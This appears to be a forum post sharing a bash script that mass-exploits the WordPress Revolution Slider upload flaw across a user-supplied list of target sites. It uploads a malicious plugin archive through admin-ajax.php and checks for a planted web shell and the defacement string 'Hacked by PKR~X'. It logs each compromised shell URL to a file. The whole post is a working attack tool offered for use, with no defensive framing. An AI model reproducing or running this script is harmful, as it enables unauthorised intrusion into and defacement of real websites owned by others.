Wordpress Revslider Exploit ( old exploit , but still have a lot sites with that POC )
Code:
!/bin/bash
#coded = Gantengers Crew
#Please download the file first revslider.zip
UploadREV(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_plugin" \
-F "action=revslider_ajax_action" \
-F "[email protected]" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
CKDFC(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/id.php" -o tmp/cdfc.txt
if [ ! -f tmp/cdfc.txt ];then
echo "[+] $urlnya : RTO"
continue
fi
cat tmp/cdfc.txt | grep -i "Hacked by PKR~X" > /dev/null;cdfc=$?
if [ $cdfc -eq 0 ];then
echo "[+] Uploading shell"
echo "[+] ${XHOST}/id.php : Upload shell success "
echo "http://${1}/id.php" >> shell.txt
else
echo "[+] $urlnya : Upload shell failed"
fi
rm -f tmp/cdfc.txt
}
CD(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "[+] $urlnya : RTO"
continue
fi
cat tmp/cd.txt | grep -i "Successfull Shell Uploaded" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "[+] ${XHOST}/ : Exploit successfully "
echo "http://${1}/wp-content/plugins/revslider/temp/update_extract/revslider/cloud.php" >> success.txt
CKDFC $urlnya
else
echo "[+] $urlnya : exploit failed"
fi
rm -f tmp/cd.txt
}
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
XHOST=$(echo $url | awk '{gsub("http://","")}2' | awk '{gsub("https://","")}2' | awk '{gsub("//","/")}2' | awk '{gsub("//","/")}2' | awk '{gsub("/","")}2')
if [ ! -f load.txt ];then
touch load.txt
fi
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
#udah pernah di load di file load.txt
#kalau mau load ulang,silakan hapus file load.txt
continue
fi
UploadREV $urlnya
CD $urlnya
done
}
Lengkap(){
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f $list ];then
echo "[?] file $list gak ada"
exit
fi
}
read -p "[+] Enter list target = " list
Lengkap
Exp